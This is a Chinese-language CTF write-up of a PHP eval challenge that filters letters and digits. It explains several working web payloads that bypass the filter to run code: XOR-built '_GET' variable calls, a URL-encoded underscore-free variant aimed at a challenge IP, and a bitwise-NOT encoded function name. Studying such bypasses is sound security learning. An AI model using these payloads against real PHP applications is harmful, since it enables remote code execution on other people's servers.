getshell不用英文数字 或者不用下划线

getshell不用英文字母和数字

上代码

实际代码没有echo strlen($code);我测试的时候加上去的

思路是eval执行getFlag函数。  

过滤了字母和数字，长度得小于40

直接看payload吧:

?code=$_="`{{{"^"?<>/";${$_}[_](${$_}[__]);&_=getFlag  

这里给大家说说我的疑惑:

①$_是什么玩意?  _是变量的名字。这句话的意思是定义了个变量，名字叫做_(你想问为什么起个这么别扭的名字那就去搜一下php变量命名规则)
②"`{{{"^"?<>/"实际是代表了双引号里面四个值对应异或，异或后的结果是_GET
③${$_}[_](${$_}[__])，按照$_是_GET拼接就好了。$_GET[_]($_GET(__))
④不是说过滤了英文字母了吗？为什么后边还有getFlag。&是传递参数是的分割符，code确实是过滤了英文字符，但是&_=getFlag中_是变量，他并没有过滤。
⑤他是怎么执行的？
@eval($_=_GET;$_GET[_]($_GET(__));&_=getFlag);
这个代码可以直接看做
@eval($_GET[_]($_GET(__));&_=getFlag);
进一步变为
@eval(getFlag($_GET(__)););   

我现在不明白getFlag()括号里的$_GET(__)有什么用，我直接去掉()里面的也可以成功的得到flag，最起码在这道题目里面并没有要求传递参数。

这个payload太麻烦了，看下一个

${"`{{{"^"?<>/"}['_']();&_=getFlag
感觉这个很妙很简单。  

这里贴一下不用下划线的

http://39.105.116.195/flag1/?code=${"`{{{"^"?<>/"}['%2b']();&%2b=getFlag
 这里的%2b就是代表着一个形式上的名字，只要不是控制字符就好，你看这里的+我就给他先编码成%2b了，不然会被当作控制字符，其他的还有很多，我觉得只要是进行了url编码的差不多都可以(都会被当做一个普通字符)。  

---

?code=$_=~%98%9A%8B%B9%93%9E%98;$_();
说下这个，对getFlag取反后url编码，为啥取反，即使你url编码后，浏览器也会进行解析，所以还是绕不过字母限制，你看下这几个url编码，解码后并没有字母，基本都是不可打印字符，所以成功的绕过了字母。用的时候先去反然后url解码就可以成功的得到getFlag()，真狠啊